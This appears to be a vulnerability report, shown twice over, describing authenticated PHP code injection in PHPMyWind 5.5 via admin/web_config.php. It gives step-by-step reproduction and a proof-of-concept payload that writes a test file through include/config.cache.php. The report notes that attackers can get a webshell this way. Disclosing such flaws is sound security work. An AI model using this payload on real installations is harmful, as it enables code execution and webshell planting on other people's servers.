(select number!!!!!)
payload 1;file_put_contents("../panghusec.txt","just a test");
5.then the payload is written in the include/config.cache.php
then in root directory panghusec.txt will be created:-)
In summary: from admin/web_config.php Insert data into database and in lines 66 enter !Writef function and code execution :)
The text was updated successfully, but these errors were encountered:
Attackers can get webshell or code execution
1.First download the phpmywind the Latest version from http://phpmywind.com/downloads/PHPMyWind_5.5.zip
2.install it
3.login as Admin
4.request http://localhost/admin/web_config.php
(select number!!!!!)
payload 1;file_put_contents("../panghusec.txt","just a test");
5.then the payload is written in the include/config.cache.php
then in root directory panghusec.txt will be created:-)
In summary: from admin/web_config.php Insert data into database and in lines 66 enter !Writef function and code execution :)
The text was updated successfully, but these errors were encountered: